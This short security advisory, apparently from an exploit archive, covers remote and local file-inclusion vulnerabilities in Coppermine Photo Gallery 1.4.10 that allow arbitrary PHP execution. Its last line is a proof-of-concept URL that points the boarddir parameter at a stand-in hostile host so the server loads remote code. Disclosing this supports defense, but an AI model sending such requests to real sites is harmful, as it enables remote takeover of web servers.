Coppermine Photo Gallery 1.4.10 - Multiple Local/Remote File Inclusions

source: https://www.securityfocus.com/bid/22409/info

Coppermine Photo Gallery is prone to multiple remote and local file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input.

An attacker can exploit these issues to execute arbitrary PHP code in the context of the webserver process. This may facilitate a remote compromise of the underlying system; other attacks are also possible.

http://www.example.com/bridge/enigma/E2_header.inc.php?boarddir=http://evil_scripts?